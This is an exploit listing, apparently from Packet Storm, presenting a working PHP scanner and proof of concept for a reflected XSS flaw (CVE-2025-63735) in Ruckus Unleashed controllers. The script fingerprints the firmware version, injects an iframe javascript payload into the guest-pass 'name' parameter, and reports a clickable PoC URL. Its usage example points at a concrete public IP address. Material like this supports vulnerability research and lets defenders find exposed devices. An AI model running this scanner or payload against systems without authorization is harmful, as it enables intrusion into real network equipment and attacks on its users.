## https://sploitus.com/exploit?id=PACKETSTORM:215813
=============================================================================================================================================
| # Title : Ruckus Unleashed 200.13.6.1.319 External Scanner |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ruckusnetworks.com/ |
=============================================================================================================================================
[+] Summary
This release introduces a remote security scanner capable of detecting vulnerable Ruckus Unleashed systems over LAN or WAN using external IP addresses.
[+] The scanner performs:
Version Enumeration
Endpoint Exposure Check
Reflected XSS Detection for CVE-2025-63735
Captive Portal Validation
Full Signature-Based Audit
The tool was built to identify Ruckus controllers exposed to the internet and automatically verify whether the system reflects unsanitized input in the name parameter.
[+] poc
usage : php poc.php --target 41.110.27.120
<?php
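/**
 * Fetch a URL with cURL and return the response body.
 *
 * TLS peer and host verification are switched off, so the response is not
 * authenticated: anything on the network path can supply the body this
 * function returns. Callers should treat results as unverified observations.
 *
 * @param string $url Absolute URL to request.
 * @return string|false Response body, or false when the handle cannot be
 *                      created or the transfer fails.
 */
function http_get($url) {
    $ch = curl_init();
    if ($ch === false) {
        // Without a handle there is nothing to configure or execute.
        return false;
    }

    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => true,
        // Bound the redirect chain and keep it on HTTP(S): the body returned
        // after a redirect may come from a different host than the one named
        // in $url, and an unbounded chain can stall the scan.
        CURLOPT_MAXREDIRS => 5,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        // Certificate checks are disabled, presumably because the devices
        // present self-signed certificates (not stated on the page).
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_TIMEOUT => 10,
    ]);

    $body = curl_exec($ch);
    curl_close($ch);

    return $body;
}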
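// Resolve the target host from the command line. Both `<target>` and
// `--target <target>` are accepted; taking $argv[1] unconditionally made the
// literal string "--target" the host name when the flag form was used.
$target = $argv[1] ?? null;
if ($target === '--target') {
    $target = $argv[2] ?? null;
}
if (!$target) {
    die("Usage: php scanner.php [--target] <target>\n");
}
echo "[+] Target: $target\n";

$base = "https://$target/selfguestpass/guestAccessSubmit.jsp";

// Baseline request with a harmless value, used to confirm the endpoint
// answers and to read a version string from the page.
$test = "$base?cookie=null&tip=5&name=test123";
echo "[+] Checking endpoint...\n";
$resp = http_get($test);
if (!$resp) {
    die("[!] No response from target.\n");
}
echo "[+] Endpoint accessible.\n";

echo "[+] Extracting version...\n";
// The build compared below has five dot-separated fields, so the pattern must
// allow a fifth one; a four-field capture can never equal "200.13.6.1.319".
// The match is the first dotted number of this shape anywhere in the body, so
// the value is a heuristic and can be something other than the firmware build.
$version = "Unknown";
if (preg_match('/([0-9]{3}(?:\.[0-9]+){3,4})/', $resp, $m) === 1) {
    $version = $m[1];
}
echo "[+] Firmware: $version\n";
if ($version === "200.13.6.1.319") {
    echo "[!] Version is vulnerable.\n";
}

echo "[+] Sending XSS payload...\n";
$payload = urlencode('</p><form><iframe src=javascript:alert(`xss`)>');
$url = "$base?cookie=null&tip=5&name=$payload";
$resp2 = http_get($url);

if (!is_string($resp2) || $resp2 === '') {
    // A failed or empty second request says nothing about the device; it was
    // previously reported as "Not vulnerable", which is a false negative.
    echo "[?] No response to the probe request; result is inconclusive.\n";
} elseif (strpos($resp2, '</p><form><iframe') !== false) {
    // The marker came back unencoded, i.e. the name parameter is reflected
    // into the page without output escaping.
    echo "[!] REFLECTED XSS CONFIRMED (CVE-2025-63735)\n";
    echo "[+] PoC URL:\n$url\n";
} else {
    // Only means this marker was not echoed back verbatim in this response.
    echo "[+] Not vulnerable.\n";
}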
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================